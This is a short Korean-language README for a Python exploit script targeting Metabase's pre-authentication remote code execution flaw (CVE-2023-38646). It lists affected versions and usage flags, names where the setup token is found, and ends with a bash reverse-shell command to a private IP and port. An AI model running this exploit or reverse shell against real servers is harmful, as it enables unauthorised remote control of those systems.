
Metabase의 사전 인증 RCE(CVE-2023-38646)용 익스플로잇 스크립트
이 Python 스크립트는 Metabase 로그인 소프트웨어의 원격 코드 실행 취약점을 악용합니다. 이를 통해 인증 전에 서버에서 임의의 명령을 실행할 수 있습니다.
취약한 버전은 Metabase 오픈 소스 0.46.6.1 이전 및 Metabase Enterprise 1.46.6.1 이전입니다.
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help 도움말 메시지를 표시하고 종료합니다
-u URL, --url URL 대상 URL
-t TOKEN, --token TOKEN
/api/session/properties에서 찾은 Setup-Token
-c COMMAND, --command COMMAND
대상 호스트에서 실행할 명령

사용된 명령: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1